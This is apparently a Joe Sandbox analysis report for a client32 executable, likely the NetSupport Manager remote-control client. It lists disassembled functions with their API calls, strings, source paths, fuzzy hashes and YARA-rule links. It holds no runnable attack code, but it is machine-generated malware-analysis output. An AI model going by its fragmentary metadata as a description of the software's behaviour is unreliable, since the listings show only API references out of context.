Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
String ID:
API String ID: 1497311044-0
Opcode ID: 6191cf186c74ae9112f6ea8ce94e4a318c72d3598519386d6d3182dab2fc4e7e
Instruction ID: 3c1e887d7967a67240c1c164b22fb9d4592e7ef048b6f648851657ace213bb1e
Opcode Fuzzy Hash: 6191cf186c74ae9112f6ea8ce94e4a318c72d3598519386d6d3182dab2fc4e7e
Instruction Fuzzy Hash: 9821C436B15214AFE711DFA8EC84BDEB7B8EF86765F1440A5F909DB240D771A9008BE0

Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,111838B8), ref: 1100D3A4
GetProcAddress.KERNEL32(00000000,111838A8), ref: 1100D3B8
GetProcAddress.KERNEL32(00000000,11183898), ref: 1100D3CD
GetProcAddress.KERNEL32(00000000,11183888), ref: 1100D3E1
GetProcAddress.KERNEL32(00000000,1118387C), ref: 1100D3F5
GetProcAddress.KERNEL32(00000000,1118385C), ref: 1100D40A
GetProcAddress.KERNEL32(00000000,1118383C), ref: 1100D41E
GetProcAddress.KERNEL32(00000000,1118382C), ref: 1100D432
GetProcAddress.KERNEL32(00000000,1118381C), ref: 1100D447

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 6cfae3bc05f78b54d57e16c39f9828ee7bdb482090c8a32c341ca59fd490a75c
Instruction ID: 1d850f4dc722c529ab0345deb5e5c80d8d70567c8a52cd3e1e9a14db29bad8e3
Opcode Fuzzy Hash: 6cfae3bc05f78b54d57e16c39f9828ee7bdb482090c8a32c341ca59fd490a75c
Instruction Fuzzy Hash: 4D31BEB1922630AFEB11CB65C8D8B5AF7E9A34C348F05827ADC298365CD7749441CF62

Function 1103B500 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1103B593
_memset.LIBCMT ref: 1103B5A1
_memmove.LIBCMT ref: 1103B5AE

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Part of subcall function 1103B280: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111D903C), ref: 1103B2B1

Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4

Strings

PF%sinclude:*exclude:, xrefs: 1103B662
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B53F, 1103B56E, 1103B5CD, 1103B603, 1103B64C, 1103B6B9, 1103B712, 1103B79C, 1103B7CF, 1103B839, 1103B870
redirect:, xrefs: 1103B678
IsA(), xrefs: 1103B544, 1103B573, 1103B5D2, 1103B608, 1103B651, 1103B6BE, 1103B717, 1103B7A1, 1103B7D4, 1103B83E, 1103B875

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$redirect:
API String ID: 3725223747-631189234
Opcode ID: 4e1b6759ef6806d2a2f9cb8291bfb9165f34a1f562f5f402a28d1e6f72bfd130
Instruction ID: af3a808404833258c6c9d3225ee65622eb91d499294cf0e06ea5ce819489668e
Opcode Fuzzy Hash: 4e1b6759ef6806d2a2f9cb8291bfb9165f34a1f562f5f402a28d1e6f72bfd130
Instruction Fuzzy Hash: F8B1D338E00A1B9FDB05DF59DC94BDEF7B6BF8920CF008154E91067685EB31AA04CBA1

Function 1103B920 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1103B9B3
_memset.LIBCMT ref: 1103B9C1
_memmove.LIBCMT ref: 1103B9CE

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

, xrefs: 1103BBC0
include:*exclude:, xrefs: 1103BA3A
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B95F, 1103B98E, 1103B9ED, 1103BA1F, 1103BA71, 1103BAFD, 1103BB30, 1103BBA1, 1103BBF7
IsA(), xrefs: 1103B964, 1103B993, 1103B9F2, 1103BA24, 1103BA76, 1103BB02, 1103BB35, 1103BBA6, 1103BBFC

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_malloc_memmove_memsetwsprintf
String ID: $IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$include:*exclude:
API String ID: 1667433189-3392632524
Opcode ID: fdfdbf8c302c7dbb0a56f41224191036054088a3f26b392a08314f0258fa5d15
Instruction ID: 530782dc7fcc8100749a43355b5b7aef35d95433ba2a6470a5fb17c60e016e94
Opcode Fuzzy Hash: fdfdbf8c302c7dbb0a56f41224191036054088a3f26b392a08314f0258fa5d15
Instruction Fuzzy Hash: C8B10239A00A179FCB16CF15D894BDAF7B6BF8930CF04C098ED5567745EA31AA05CBA0

Function 1106B4C0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 1106B563
__CxxThrowException@8.LIBCMT ref: 1106B578

Part of subcall function 11082CA0: _memset.LIBCMT ref: 11082CBF
Part of subcall function 11082CA0: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106B543,00000000,00000000,1117066E,000000FF), ref: 11082D30

Strings

Find, xrefs: 1106B5A8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset$CriticalException@8InitializeSectionThrow_mallocstd::exception::exceptionwsprintf
String ID: Find
API String ID: 523791932-1771883322
Opcode ID: 8862f12f142f7f17eb3423287ecf04bd00d845d2771b8a10e84e4ddae85b51a2
Instruction ID: 5db3a692f28a1e7eabe5ce6be605795cb1bc4f4b77a9999ad3559537c86c9e21
Opcode Fuzzy Hash: 8862f12f142f7f17eb3423287ecf04bd00d845d2771b8a10e84e4ddae85b51a2
Instruction Fuzzy Hash: 17B16DB5E006099FDB10CFA8C880AAEBBF8FF48314F14456EE416A7340EB75A901CB61

Function 11041740 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 11041778
_malloc.LIBCMT ref: 110417D7
_memmove.LIBCMT ref: 1104183C
SendMessageTimeoutA.USER32(?,0000004A,00010486,00000003,00000002,00002710,?), ref: 1104189C
_free.LIBCMT ref: 110418A3

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h, xrefs: 110417C1, 110417F8, 11041824, 11041862
IsA(), xrefs: 110417C6, 110417FD, 11041829, 11041867

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
API String ID: 3610575347-2967710367
Opcode ID: 1d96ad792b870448ac1421bad967a5fc5362d0f80d98012e1602e8b3a2458b34
Instruction ID: 5f847ffeaf8ab7aa20607dcdf657b4052752ec8b68bbbdfc22ac1d27c6574067
Opcode Fuzzy Hash: 1d96ad792b870448ac1421bad967a5fc5362d0f80d98012e1602e8b3a2458b34
Instruction Fuzzy Hash: BF416F75E0051AAFDB05CF95EC80EDDF3B4BF58718F108269F825A7694EB30A605CB91

Function 110F9400 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 110threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

CreateThread.KERNEL32(00000000,00000000,110E9400,00000000,00000000,00000000), ref: 110F94CD
WaitForSingleObject.KERNEL32(00000000,000000FF,?,1104A1B3), ref: 110F94D8
GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,1104A1B3), ref: 110F94E3
CloseHandle.KERNEL32(00000000,?,1104A1B3), ref: 110F94EA
SetLastError.KERNEL32(00000000,?,1104A1B3), ref: 110F9534

Part of subcall function 110F8E80: _free.LIBCMT ref: 110F8F24
Part of subcall function 110F8E80: _malloc.LIBCMT ref: 110F8F37
Part of subcall function 110F8E80: _memmove.LIBCMT ref: 110F8F53

Strings

Client, xrefs: 110F9496
OldLogonUser, xrefs: 110F9491

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Thread_malloc$CloseCodeCreateErrorExitHandleLastObjectSingleWait_free_memmove_memsetwsprintf
String ID: Client$OldLogonUser
API String ID: 2273177647-3714759566
Opcode ID: c749c10b528402f76e781cde6db9bcf01e9e5f43c0efe7e3d428c594cd5ae9c0
Instruction ID: 2f702813f4b4ab6c25c38db0d8a5041f92371cc8998c0e340031248ecbe83333
Opcode Fuzzy Hash: c749c10b528402f76e781cde6db9bcf01e9e5f43c0efe7e3d428c594cd5ae9c0
Instruction Fuzzy Hash: 624135B5D0561A9FDB00DFA4C845BEEB7F4EB49324F104619F925A7380EB34A500CBA1

Function 110C36E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 110C375B
GetWindowRect.USER32(?,?), ref: 110C3769
MapWindowPoints.USER32(00000000,?,00000018,00000002), ref: 110C37A4

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

hWnd, xrefs: 110C370A
m_hWnd, xrefs: 110C3743
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110C373E
..\ctl32\nsmdlg.cpp, xrefs: 110C3705

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$ErrorExitLastMessagePointsProcesswsprintf
String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$hWnd$m_hWnd
API String ID: 976951863-995508580
Opcode ID: 4e41528abb20f9a6d2d02e2b73750ef16f48d486b0cf7e7d4fd92e5a1b7ca294
Instruction ID: a45d41c407db525ce30fe00c631d015427f9366890c9d12a47637e28a0381bf7
Opcode Fuzzy Hash: 4e41528abb20f9a6d2d02e2b73750ef16f48d486b0cf7e7d4fd92e5a1b7ca294
Instruction Fuzzy Hash: CF415DB5A0060AAFCB04CF58C884EAEFBB4BF48718B00C199E9195B655D730E915CFA0

Function 1100F380 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F3AD
std::_Lockit::_Lockit.LIBCPMT ref: 1100F3D0
std::bad_exception::bad_exception.LIBCMT ref: 1100F454
__CxxThrowException@8.LIBCMT ref: 1100F462
std::_Lockit::_Lockit.LIBCPMT ref: 1100F475
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F48F

Strings

bad cast, xrefs: 1100F44C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: d1a36058dcafd43632a995b00d63964de3846e5127b68f0cf164bd7fd6529456
Instruction ID: c1df3a49ef77ffe82b92d999ae27bd748b28a168d2cc7080f961c8e04f266e9b
Opcode Fuzzy Hash: d1a36058dcafd43632a995b00d63964de3846e5127b68f0cf164bd7fd6529456
Instruction Fuzzy Hash: F631A075D002169FDB15CF58C884B9EF7B8EB0576CF52466DEC21A7680DB30AA40CB93

Function 11021260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,11182200), ref: 110212D6
GetDlgItem.USER32(?,?), ref: 110212EA
SetFocus.USER32(00000000), ref: 110212ED
GetDlgItem.USER32(?,?), ref: 11021318
EnableWindow.USER32(00000000,00000000), ref: 1102131D

Strings

m_hWnd, xrefs: 11021306
e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h, xrefs: 11021301

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$EnableFocusTextWindow
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h$m_hWnd
API String ID: 467963834-3304639117
Opcode ID: 3cc505f6fa39f18cb636a32da8b2f10ffb60bb9d01c7e8319a9f9713b2288b6a
Instruction ID: 0817eb63cdeeee23d12745cd5909b56861137a8bde73a4db9cb5005db0e53ffe
Opcode Fuzzy Hash: 3cc505f6fa39f18cb636a32da8b2f10ffb60bb9d01c7e8319a9f9713b2288b6a
Instruction Fuzzy Hash: 09216A76A00700AFD711DB55CC84F9BFBE9FB49714F408929F95697784C774A900CBA0

Function 110095A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110C63A0: wvsprintfA.USER32(?,?,00000000), ref: 110C63D2

WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009656
WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100966B

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

r>b/, xrefs: 110095C9, 110095D6, 110095EB, 110095F3, 110095DE
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009608, 11009630
<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009665
<HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 110095D9
IsA(), xrefs: 1100960D, 11009635

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$r>b/
API String ID: 863766397-2875610074
Opcode ID: d60069f5e1de0f43d3ee76dcbf86c54028c08c36dc082fe327747f164939fbe6
Instruction ID: 691b7d999311c479868ee19ae1316f275a6346ce6453caec75fd1e84fec43159
Opcode Fuzzy Hash: d60069f5e1de0f43d3ee76dcbf86c54028c08c36dc082fe327747f164939fbe6
